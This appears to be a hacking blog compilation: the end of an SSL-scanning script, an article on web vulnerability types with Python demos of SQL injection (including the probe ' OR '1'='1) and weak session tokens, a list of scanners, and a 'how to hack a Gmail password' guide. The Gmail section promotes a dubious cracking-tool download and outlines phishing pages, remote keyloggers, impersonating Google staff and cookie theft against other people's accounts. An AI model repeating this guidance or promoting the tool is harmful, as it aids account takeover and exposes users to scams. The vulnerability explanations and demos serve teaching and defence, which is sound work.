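    for f in parse_sslscan(SAMPLE_SSLSCAN_OUTPUT):
        print(f"{f.protocol:8} {f.suite:32} {'; '.join(f.reasons)}")
```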

These were some key points on Secure Sockets Layer (SSL) reconnaissance: hunting down a victim and playing with cyphers.

I hope you all enjoyed reading this article.

Let me know your experiences in the comment section below.

Happy Hacking!!!

How To Find Vulnerabilities In A Website? : (Bug Hunting)


Nothing in the world is perfect, and websites are no exception.

Any site, however well built, will certainly have some kind of defect: vulnerabilities.

Whether white hat or black hat, a hacker has to find vulnerabilities in order to hack the site.

In this article we will learn how to find vulnerabilities, so let’s jump into it.

Vulnerability

A vulnerability, in information technology (IT), is a flaw in code or design that creates a potential point of security compromise for an endpoint or network.

Vulnerabilities create possible attack vectors, through which an intruder could run code or access a target system’s memory.

The methods by which vulnerabilities are exploited are varied and include code injection and buffer overflows; they may be carried out through hacking scripts, applications, and freehand coding.

Vulnerabilities are constantly being researched and identified by the security industry, software vendors, cyber criminals and other individuals.

Some organizations offer bug bounties for these disclosures.

Types of Vulnerabilities

Command Injection

Command injection is a technique that allows an attacker to execute system commands by abusing an application feature.

The injection usually happens when the developer uses user input to construct an executable command, specifically for the system shell in use.

Expression Language Injection

Expression Language Injection occurs when attacker-controlled data enters an interpreter, i.e. the data is evaluated as code.

Default Login

A default login is a login that is the same for every instance of the application.

It is commonly used to allow first-time access to hardware-bundled control panels and administration interfaces.

Local File Include

A Local File Include is a vulnerability that allows attackers to retrieve or execute server-side files.

The vulnerability arises because the developer allows unsanitized user-supplied input to be used in functions that open, read or display the contents of files.

Remote Code Injection

Remote Code Injection is a vulnerability that allows an attacker to remotely inject code into an application in order to change its execution flow.

The issue usually occurs because the application is written in a language that allows dynamic evaluation of code at runtime.

Remote File Include

A Remote File Include is a vulnerability that allows attackers to manipulate the application into including a remote file hosted on a third-party server.

This file may be executable, usually written in a scripting language.

SQL Injection

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of a web application.

The vulnerability is present when user input is incorrectly filtered for special characters embedded in a SQL statement and is therefore unexpectedly executed, i.e. the input was injected into the SQL statement issued by the web application.

Vanilla SQL Injection

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of a web application.

The vulnerability is present when user input is incorrectly filtered for special characters embedded in a SQL statement and is therefore unexpectedly executed, i.e. the input was injected into the SQL statement issued by the web application.
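The SQL injection entries above, as an added example (not code from the original article): the same login query built two ways in Python’s sqlite3 against a constructed in-memory table. The string-built version lets a quote character in the input rewrite the WHERE clause, while the parameterised version keeps the statement structure fixed and treats the input as data.

```python
import sqlite3


def make_db():
    """In-memory users table with constructed sample rows (not real credentials).
    Plaintext passwords are used only to keep the example short; a real system
    stores password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting: special characters in the
    input become part of the SQL, so an attacker controls the WHERE clause."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterised(conn, username, password):
    """Uses placeholders: the database receives the statement and the values
    separately, so the same input can only ever be compared as a string."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"          # constructed input with an unescaped quote
    print("vulnerable:    ", login_vulnerable(db, "x", probe))     # every user
    print("parameterised: ", login_parameterised(db, "x", probe))  # no match
```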

Weak Session Management

This occurs when the web application generates a session cookie whose value is easily guessable.

For instance, the session may be based on UNIX timestamps, or just an MD5 of a timestamp, and so on.
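An added example, not from the original article, of the weak session cookie just described: a token that is only MD5 of a Unix timestamp can be recovered by hashing every second in a plausible window, whereas a token drawn from the operating system’s CSPRNG cannot. The function names and the sample timestamp are constructed for this illustration.

```python
import hashlib
import secrets


def weak_session_token(unix_time):
    """The anti-pattern from the text: the cookie value is MD5 of a timestamp.
    The only secret is the login second, which an observer can estimate."""
    return hashlib.md5(str(unix_time).encode()).hexdigest()


def strong_session_token():
    """32 bytes from the OS CSPRNG, URL-safe encoded: 256 bits of entropy,
    so there is no window small enough to search."""
    return secrets.token_urlsafe(32)


def recover_timestamp(token, approx_time, window=3600):
    """Audit helper: if token equals MD5(t) for some second t within +/- window
    of approx_time, return t, otherwise None. Searching an hour either side is
    only a few thousand hashes, which is exactly why this scheme is weak."""
    for t in range(approx_time - window, approx_time + window + 1):
        if weak_session_token(t) == token:
            return t
    return None


if __name__ == "__main__":
    login_time = 1_700_000_000                 # constructed sample timestamp
    weak = weak_session_token(login_time)
    print("weak token recovered at:", recover_timestamp(weak, login_time + 500))
    print("strong token recovered at:", recover_timestamp(strong_session_token(), login_time))
```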

Cross-site Scripting

XSS is a type of web application security vulnerability that allows code injection by malicious web users into the pages viewed by other users.

LDAP Injection

LDAP Injection is a code injection technique used against applications that build LDAP statements based on user input.

LDAP is an application protocol used to access and maintain distributed directory services such as Microsoft‘s Active Directory.

Persistent Cross-site Scripting

XSS is a type of web application security vulnerability that allows code injection by malicious web users into the pages viewed by other users.

Stored Cross-site Scripting is a type of XSS where the injected script is permanently stored on the web server/application.

Whenever a user requests an infected page from the server, the payload is delivered directly, embedded in the response, so it executes without any user interaction.

Reflected Cross-site Scripting

XSS is a type of web application security vulnerability that allows code injection by malicious web users into the pages viewed by other users.

Reflected Cross-site Scripting is a type of XSS where the injected code is reflected off the web server.

This kind of XSS is short-lived and requires a phishing vector to be delivered to the victim.

XML Injection

XML Injection is a code injection variant that attackers can use to include a malicious XML block, which is then processed by an XML parser.

XPATH Injection

XPATH Injection is a code injection technique that applies when an application uses user-supplied data to build XPATH queries to retrieve and write data stored in XML form.

Cross-site Request Forgery

CSRF is an attack that forces an end user to execute unwanted actions on a web application with which they are currently authenticated.

Applications vulnerable to this attack have no way to distinguish legitimate requests from forged ones.

Open Cross Domain Policy

A Cross-Domain Policy File is used to enforce the same-origin policy in modern web applications by preventing some types of content from being accessed or modified from another domain via the client.

An open cross-domain policy is the vulnerability that occurs when the policy file explicitly allows every external domain.

Best Open Source Web Application Vulnerability Scanners

Grabber:

Grabber is a nice web application scanner which can detect many security vulnerabilities in web applications.

It performs scans and tells you where the vulnerability exists.

It can detect the following vulnerabilities:

  • Cross site scripting
  • SQL injection
  • Ajax testing
  • File inclusion
  • JS source code analyzer
  • Backup file check

Vega

Vega is another free open source web vulnerability scanner and testing platform.

With this tool, you can perform security testing of a web application.

This tool is written in Java and offers a GUI based environment.

It is available for OS X, Linux and Windows.

It can be used to find SQL injection, header injection, directory listing, shell injection, cross site scripting, file inclusion and other web application vulnerabilities.

This tool can also be extended using a powerful API written in JavaScript.

While working with the tool, it lets you set a few preferences such as the total number of path descendants, the number of child paths of a node, depth and the maximum number of requests per second.

You can use Vega Scanner, Vega Proxy, Proxy Scanner and also Scanner with credentials.

Zed Attack Proxy

Zed Attack Proxy is also known as ZAP.

This tool is open source and is developed by OWASP.

It is available for Windows, Unix/Linux and Macintosh platforms.

I personally like this tool. It can be used to find a wide range of vulnerabilities in web applications.

The tool is very straightforward and easy to use.

Even if you are new to penetration testing, you can easily use this tool to start learning penetration testing of web applications.

To know the complete working of ZAP, click here.

Wapiti

Wapiti is also a good web vulnerability scanner which lets you audit the security of your web applications.

It performs black-box testing by scanning pages and injecting data.

It tries to inject payloads and checks whether a script is vulnerable.

It supports both GET and POST HTTP attacks and detects numerous vulnerabilities.

It can detect the following vulnerabilities:

  • File disclosure
  • File inclusion
  • Cross Site Scripting (XSS)
  • Command execution detection
  • CRLF Injection
  • SQL Injection and XPath Injection
  • Weak .htaccess configuration
  • Backup files disclosure
  • and many others

Wapiti is a command line application.

So it may not be easy for beginners. But for experts, it will perform well.

Skipfish

Skipfish is also a good web application security tool.

It crawls the website, then checks each page for various security threats and at the end prepares the final report.

This tool was written in C.

It is highly optimized for HTTP handling and uses minimal CPU.

It claims that it can easily handle 2000 requests per second without adding load on the CPU.

It uses a heuristic approach while crawling and testing web pages.

This tool also claims to offer high quality results and fewer false positives.

This tool is available for Linux, FreeBSD, MacOS X, and Windows.

Ratproxy

Ratproxy is also an open source web application security audit tool which can be used to find security vulnerabilities in web applications.

It supports Linux, FreeBSD, MacOS X, and Windows (Cygwin) environments.

This tool is designed to overcome the problems users usually face while using other proxy tools for security audits.

It is capable of distinguishing CSS stylesheets and JavaScript code.

It also supports SSL man-in-the-middle interception, which means you can also see data passing through SSL.

Grendel-Scan

Grendel-Scan is another nice open source web application security tool.

This is an automatic tool for finding security vulnerabilities in web applications.

Many features are also available for manual penetration testing.

This tool is available for Windows, Linux and Macintosh.

This tool was developed in Java.

X5S

X5s is also a Fiddler add-on which aims to provide a way to find cross-site scripting vulnerabilities.

This is not an automatic tool.

So, you need to understand how encoding issues can lead to XSS.

You need to manually find the injection point and then check where XSS can occur in the application.

Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version-specific problems on over 270 servers.

It also checks for server configuration items such as the presence of multiple index files and HTTP server options, and will attempt to identify installed web servers and software.

Scan items and plugins are frequently updated and can be updated automatically.

Complete guide to working with Nikto here.

Watcher

Watcher is a passive web security scanner.

It doesn’t attack with loads of requests or crawl the target site.

It is not a separate tool but rather an add-on for Fiddler.

So you need to first install Fiddler and then install Watcher to use it.

It quietly analyses the requests and responses from the user’s interaction and then produces a report on the application.

As it is a passive scanner, it won’t affect the site’s hosting or cloud infrastructure.

So I hope this article helps you.

Try these Vulnerability scanners and let me know about your experiences in the comment section below.

Happy Hacking…


How to Hack Gmail Account Password In Minutes Online ?! : Guide

How to Hack A Gmail Account Password In Minutes [All Methods Described] ?! : Tutorial

In this article, I’m going to show you the different ways in which a Gmail account password can be hacked!!

On the Internet, 95% of the tools we find on many websites are hopeless.

That doesn’t mean there is no way to hack Gmail; there are a few ways that are apt for hacking.

Gmail Hacking

Gmail is a free Web-based e-mail service currently being tested at Google that provides users with a gigabyte of storage for messages and provides the ability to search for specific messages.

The Gmail program also automatically organizes successively related messages into a conversational thread.

Ways to Hack Gmail Account Password!

I’ll show you 5 ways to hack a Gmail Account:

PASS BREAKER

PASS BREAKER is the only legit tool available on the internet that can really hack a Gmail account. Developed by a hacker, it is used by thousands of users per day who want to hack Gmail passwords. Today, the only quick and efficient solution is PASS BREAKER. This app is unique because it is smartphone, tablet and computer compatible.

Here is how it works:

Once you have downloaded it and run it, PASS BREAKER will only require a Gmail email address to hack the password and show it on the screen of your device.

You can download PASS BREAKER here: https://www.passwordrevelator.net/en/passbreaker.php

  • NOTE: HackeRoyale does NOT claim or guarantee about the proper working or functioning of this tool. These are purely views of the author & in no way related to HackeRoyale’s own views or interests. Please think twice before taking any step further. HackeRoyale will NOT be responsible in any manner for if the tool doesn’t work as per the expectations. We DO NOT guarantee the authenticity or legitimacy of the tool. Hence, beware!

Phishing 

Phishing still remains to be an extremely effective way for hackers to steal login credentials, payment card information, and a multitude of other types of data.

Watch our exclusive video on Gmail phishing below to explore more!

Essentially, the hacker tries to setup a website that looks and behaves exactly like another website – which, in this scenario, is Gmail.


All the attacker really needs to do is copy the web code from the login screen, add a small amount of PHP code, and then harvest usernames and passwords.

After the false phishing site has been setup, the hacker then sends links of the bogus site to all of their victims.

A careless user won’t see that the URL is slightly different and will consequently send their username and password straight into the hands of the attacker.

Then the phishing site typically redirects the user to the genuine site to avoid suspicion.

Though there are a lot of phishing filters and web URL blacklists that attempt to stamp out phishing, there are always new phishing sites popping up, and there is nothing we can do to eliminate them completely.

Keyloggers

A keylogger is probably one of the most effective and popular ways to hack information.

A keylogger is a type of software that runs in the background of the target’s computer, recording every single keystroke they enter.

Though many advanced hackers employ complex methods of installing keyloggers remotely, such as embedding the program in a P2P file download or other type of software, even novices can install these programs if they have access to the target’s computer.

However, some keylogger programs have tools that help the attacker complete the installation remotely, such as Realtime-Spy.

And hardware keyloggers are even easier to install, because they typically look like a PS/2 plug or a USB flash drive that can easily be inserted into the back of a desktop computer, without the target being any the wiser.

Many of them are even undetectable by the latest anti-virus and anti-spyware software.


Social Engineering

Social engineering has remained another effective alternative for hackers to steal users’ login credentials.

The idea is to impersonate another individual or to dupe the target into willingly forfeiting their login credentials, and there are several ways to do this.

The first way is to create a false account that has an address that looks like it belongs to a friend, acquaintance, or colleague of the victim.

Then there are a variety of lies a hacker can tell, like they need your login information to recover their account, etc.

In addition, hackers often mimic administrators or Google employees in an effort to garner more trust from their victims.

Some spam emails claim that Google was recently hacked and that they need your username and password to check if your account has been compromised.

But Google employees will never ask you for your account information, so remember that you should never hand over your login credentials to a third party – even if they seem to be legitimate.

Stealing Cookies

There are a number of ways to steal cookies from other users’ sessions and to inject them into your own web browser.

Tools like Firecookie, Wireshark Cookie Injector, GreaseMonkey for Firefox, and a myriad of other tools will allow you to sniff out a cookie on the local LAN and then use that cookie to hijack the user’s session.

The easiest place for a hacker to perform this attack is on public Wi-Fi networks like those found at cafes, but some hackers engage in war driving to find weak or exposed wireless networks.

The bottom line is that once the cookie has been stolen, the attacker can then login to the account and read emails, send emails, and change account settings to block the original user.

Things to do to reduce the chances of being hacked!

  • First and foremost, make sure you never give your password out to another individual even if they’re your friend.
  • Always make sure that you log out of Gmail when you are finished perusing your email to avoid becoming the victim of session hijacking.
  • Everyone should be regularly scanning their computer with antivirus and antispyware software to help decrease the chance of becoming infected with a keylogger and other similar types of dubious programs that lead to someone hacking your Gmail account.

I hope this article Helps You a lot. Comment your queries or feedback below! 😉